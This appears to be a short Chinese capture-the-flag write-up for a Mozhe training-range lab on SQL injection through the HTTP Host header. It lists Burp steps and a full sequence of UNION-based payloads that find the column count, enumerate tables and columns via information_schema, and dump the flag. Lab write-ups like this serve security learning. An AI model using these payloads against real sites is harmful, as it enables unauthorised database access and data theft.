SQL注入漏洞测试(HTTP头注入)

0x00
依然是墨者的靶场
https://www.mozhe.cn/bug/detail/UWE3d3dJTWlmMDBYVUwvVFI0T2dmQT09bW96aGUmozhe
0x01
burp抓包在host部位进行注入

后面这个ip地方不要删去加个#隔开就好
order by 4,长度为4
union select 1,2,3,4 判断显示位
union select 1,database(),2,3 判断当前数据库
union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database() 判断当前表
union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='flag' and table_schema=database() 判断当前列
union select 1,group_concat(flag),3,4 from flag 获取flag

提交flag后给你个key提交就可以了

原文地址:https://www.cnblogs.com/lingyi888/p/13228878.html